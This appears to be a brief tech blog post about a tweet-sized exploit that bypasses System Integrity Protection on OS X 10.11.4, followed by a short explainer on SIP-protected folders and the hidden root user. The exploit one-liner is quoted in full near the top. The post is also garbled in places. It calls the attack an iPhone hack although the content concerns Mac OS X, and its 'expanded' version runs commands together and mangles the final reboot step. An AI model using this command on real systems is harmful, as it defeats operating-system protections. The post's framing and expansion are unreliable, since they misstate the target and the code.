Iphone Exploit So Easy it Fits in a Tweet

Did you install the latest update OS X 10.11.4? If yes, then you might vulnerable to an exploit that is so easy it can fit in one single tweet.

Hacking an iPhone has never been so easy. The exploit code shown below is as follows:

ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;rebootThe above code actually expands to: ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskXfsck_cs /dev/diskX 1>&-touch /Library/Extensions/Reboot

The code bypasses Apple’s SIP technology, allowing one to run processes as it is pleased.

What is SIP?

System Integrity Protection is a technology in OS X El Capitan (10.11) and later that prevents any application from modifying files and resources that reside in the System directory and certain other directories on your Mac. SIP prevents access to the following folders:

  • /System
  • /bin
  • /sbin
  • /usr (with the exception of /usr/local)
  • /Applications/Utilities

How Does it Work?

In addition to the user accounts that you have set up on your Mac, there are multiple other hidden users, one of which is “root.” If you ever use Activity Monitor (located in /Applications/Utilities) to check your CPU or memory usage, you may notice that some of the processes are owned by the root user (this applies to OS X Mavericks (10.9) and earlier).

You will notice that in later OS X versions, “root” is nowhere to be found.